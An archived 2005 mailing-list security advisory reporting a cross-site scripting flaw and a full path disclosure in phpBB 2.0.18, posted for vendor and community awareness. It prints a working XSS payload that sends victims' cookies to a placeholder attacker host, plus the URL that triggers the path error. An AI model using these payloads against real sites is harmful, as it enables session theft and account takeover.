| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat Dec 17 18:53:52 2005
From: max at jestsuper.pl (Maksymilian Arciemowicz)
Subject: phpBB 2.0.18 XSS and Full Path Disclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a user-friendly interface, simple and
straightforward administration panel, and helpful FAQ. Based on the powerful
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
Access/ODBC database servers, phpBB is the ideal free community solution for
all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile
"Always allow HTML: YES" or are you Guest
that you can use this tags:
<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>
Exploit:
<B C=">"
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X="<B "> H A L O </B>
and have you cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);
return;
}
- -25-31---
function append_sid() dosen't exists. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists